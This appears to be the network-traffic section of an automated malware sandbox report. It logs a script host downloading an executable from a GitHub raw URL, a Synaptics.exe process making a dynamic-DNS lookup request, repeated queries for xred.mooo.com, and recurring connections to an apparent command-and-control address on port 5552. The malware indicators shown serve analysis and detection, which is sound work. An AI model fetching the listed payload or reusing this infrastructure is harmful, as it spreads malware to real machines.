                                                                                                                              Dec 30, 2024 11:48:58.093240023 CET50222443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.093251944 CET44350222142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.093480110 CET44350222142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.095371962 CET50222443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.095873117 CET50222443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.143331051 CET44350222142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.380069017 CET44350222142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.380280972 CET50222443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.380295038 CET44350222142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.380445957 CET50222443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.381198883 CET44350222142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.381237030 CET44350222142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.381287098 CET50222443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.381287098 CET50222443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.382322073 CET50222443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.382334948 CET44350222142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.383857012 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.383872986 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.384068966 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.384304047 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.384316921 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.422174931 CET44350221142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.422252893 CET50221443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.422719002 CET50221443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.422754049 CET44350221142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.422883034 CET44350221142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.422985077 CET50221443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.423553944 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.423604012 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.423787117 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.424024105 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:58.424036980 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.443072081 CET44350220142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.443120003 CET44350220142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.443141937 CET50220443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.443151951 CET44350220142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.443164110 CET50220443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.443197012 CET50220443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.443202019 CET44350220142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.443242073 CET50220443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.443247080 CET44350220142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.443264961 CET44350220142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.443308115 CET50220443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.444247007 CET50220443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.444253922 CET44350220142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.444770098 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.444798946 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.445035934 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.445317030 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.445332050 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.478732109 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.478913069 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.479338884 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.479342937 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.479520082 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.479523897 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.499752998 CET555250207172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.499835968 CET502075552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:48:58.520632982 CET502075552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:48:58.525544882 CET555250207172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.916297913 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.916361094 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.916373968 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.916384935 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.916410923 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.916452885 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.916457891 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.916480064 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.916508913 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.916536093 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.917201996 CET50226443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.917211056 CET44350226142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.917721033 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.917754889 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:58.917818069 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.918030977 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:58.918045998 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:59.051074028 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:59.051211119 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:59.070595980 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:59.070648909 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:48:59.072036982 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:59.072241068 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:48:59.526226997 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:59.526284933 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:05.467055082 CET502775552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:05.471867085 CET555250277172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:05.471940041 CET502775552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:05.472424030 CET502775552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:05.477160931 CET555250277172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:13.127692938 CET555250277172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:13.127846956 CET502775552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:13.145054102 CET502775552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:13.149975061 CET555250277172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:14.482846022 CET503045552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:14.487673998 CET555250304172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:14.487760067 CET503045552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:14.488094091 CET503045552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:14.492883921 CET555250304172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.432492018 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.432517052 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.434125900 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.434151888 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.435240030 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.435256958 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.435789108 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.435822010 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.437222004 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.437227964 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.437515020 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.437525034 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.438179016 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.438186884 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.438188076 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.438193083 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.724284887 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.724354982 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.724387884 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.724467039 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.725358963 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.725409985 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.725411892 CET44350231142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.725811005 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.729784012 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.729959011 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.729979038 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.730123043 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.730130911 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.730161905 CET44350232142.250.185.78192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.730231047 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:20.755856037 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.755897999 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.755930901 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.755954981 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.755974054 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.756026030 CET44350237142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.756045103 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.756419897 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.920311928 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.920377016 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.920382977 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.920401096 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.920416117 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.920463085 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.920468092 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.920511961 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:20.920523882 CET44350233142.250.185.225192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:20.920578957 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:30.590912104 CET555250304172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:30.590975046 CET503045552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:30.649446011 CET503045552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:30.654314995 CET555250304172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:30.670314074 CET503085552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:30.675282001 CET555250308172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:30.675375938 CET503085552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:30.675750971 CET503085552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:30.680598974 CET555250308172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:32.822130919 CET555250308172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:32.823890924 CET503085552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:32.849458933 CET503085552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:32.854343891 CET555250308172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:35.101099968 CET4974780192.168.2.469.42.215.252
                                                                                                                              Dec 30, 2024 11:49:35.105846882 CET50231443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:35.105988979 CET50232443192.168.2.4142.250.185.78
                                                                                                                              Dec 30, 2024 11:49:35.106014967 CET50233443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:35.106060982 CET50237443192.168.2.4142.250.185.225
                                                                                                                              Dec 30, 2024 11:49:39.764744043 CET503095552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:39.769664049 CET555250309172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:39.769743919 CET503095552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:39.770025969 CET503095552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:39.774884939 CET555250309172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:41.940085888 CET555250309172.111.138.100192.168.2.4
                                                                                                                              Dec 30, 2024 11:49:41.940160036 CET503095552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:41.960032940 CET503095552192.168.2.4172.111.138.100
                                                                                                                              Dec 30, 2024 11:49:41.964868069 CET555250309172.111.138.100192.168.2.4

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 30, 2024 11:47:34.898458958 CET6321853192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:47:34.905275106 CET53632181.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:00.082885981 CET5254953192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:00.090195894 CET53525491.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:01.168143988 CET5073253192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:01.175436974 CET53507321.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:01.322763920 CET6210153192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:01.329921007 CET53621011.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:01.496635914 CET4975353192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:01.503922939 CET53497531.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:07.626605988 CET5209353192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:07.634757042 CET53520931.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:12.359764099 CET6375853192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:12.367472887 CET53637581.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:18.030895948 CET6454653192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:18.038057089 CET53645461.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:24.977119923 CET5318153192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:24.984378099 CET53531811.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:29.749969959 CET6385553192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:29.757087946 CET53638551.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:35.422439098 CET5742453192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:35.536365032 CET53574241.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:40.073307037 CET5481253192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:40.080221891 CET53548121.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:45.969410896 CET5470853192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:45.976886988 CET53547081.1.1.1192.168.2.4
                                                                                                                              Dec 30, 2024 11:48:52.749273062 CET5467353192.168.2.41.1.1.1
                                                                                                                              Dec 30, 2024 11:48:52.756660938 CET53546731.1.1.1192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Dec 30, 2024 11:47:34.898458958 CET192.168.2.41.1.1.10x9511Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:00.082885981 CET192.168.2.41.1.1.10xf080Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:01.168143988 CET192.168.2.41.1.1.10x535Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:01.322763920 CET192.168.2.41.1.1.10xfdb9Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:01.496635914 CET192.168.2.41.1.1.10xd47fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:07.626605988 CET192.168.2.41.1.1.10x1a94Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:12.359764099 CET192.168.2.41.1.1.10x50cbStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:18.030895948 CET192.168.2.41.1.1.10x79cdStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:24.977119923 CET192.168.2.41.1.1.10xfb4Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:29.749969959 CET192.168.2.41.1.1.10xd33dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:35.422439098 CET192.168.2.41.1.1.10x654dStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:40.073307037 CET192.168.2.41.1.1.10x4d2eStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:45.969410896 CET192.168.2.41.1.1.10x85a7Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:52.749273062 CET192.168.2.41.1.1.10xd428Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Dec 30, 2024 11:47:34.905275106 CET1.1.1.1192.168.2.40x9511No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:47:34.905275106 CET1.1.1.1192.168.2.40x9511No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:47:34.905275106 CET1.1.1.1192.168.2.40x9511No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:47:34.905275106 CET1.1.1.1192.168.2.40x9511No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:00.090195894 CET1.1.1.1192.168.2.40xf080No error (0)docs.google.com142.250.185.78A (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:01.175436974 CET1.1.1.1192.168.2.40x535Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:01.329921007 CET1.1.1.1192.168.2.40xfdb9No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:01.503922939 CET1.1.1.1192.168.2.40xd47fNo error (0)drive.usercontent.google.com142.250.185.225A (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:07.634757042 CET1.1.1.1192.168.2.40x1a94Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:12.367472887 CET1.1.1.1192.168.2.40x50cbName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:18.038057089 CET1.1.1.1192.168.2.40x79cdName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:24.984378099 CET1.1.1.1192.168.2.40xfb4Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:29.757087946 CET1.1.1.1192.168.2.40xd33dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:35.536365032 CET1.1.1.1192.168.2.40x654dName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:40.080221891 CET1.1.1.1192.168.2.40x4d2eName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:45.976886988 CET1.1.1.1192.168.2.40x85a7Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                              Dec 30, 2024 11:48:52.756660938 CET1.1.1.1192.168.2.40xd428Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • raw.githubusercontent.com
                                                                                                                              • docs.google.com
                                                                                                                              • drive.usercontent.google.com
                                                                                                                              • freedns.afraid.org

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.44974769.42.215.252807792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 30, 2024 11:48:01.336918116 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                              User-Agent: MyApp
                                                                                                                              Host: freedns.afraid.org
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Dec 30, 2024 11:48:01.944955111 CET243INHTTP/1.1 200 OK
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:01 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Cache: MISS
                                                                                                                              Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.449730185.199.108.1334437344C:\Windows\System32\wscript.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:47:35 UTC375OUTGET /knkbkk212/knkbkk212/refs/heads/main/FGNEBI.exe HTTP/1.1
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-ch
                                                                                                                              UA-CPU: AMD64
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-30 10:47:35 UTC903INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1691136
                                                                                                                              Cache-Control: max-age=300
                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              ETag: "6d0dcdda27caff80b25fbc399f986a0f34fa100b9f533320d14e45d134550949"
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              X-Frame-Options: deny
                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                              X-GitHub-Request-Id: B431:2C3DEF:1BBE28:1F5D9F:67727A41
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Date: Mon, 30 Dec 2024 10:47:35 GMT
                                                                                                                              Via: 1.1 varnish
                                                                                                                              X-Served-By: cache-ewr-kewr1740061-EWR
                                                                                                                              X-Cache: MISS
                                                                                                                              X-Cache-Hits: 0
                                                                                                                              X-Timer: S1735555655.458395,VS0,VE159
                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              X-Fastly-Request-ID: 494df802aee41bd9766112110193b5b05fdf89d0
                                                                                                                              Expires: Mon, 30 Dec 2024 10:52:35 GMT
                                                                                                                              Source-Age: 0
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Data Ascii: MZP@!L!This program must be run under Win32$7
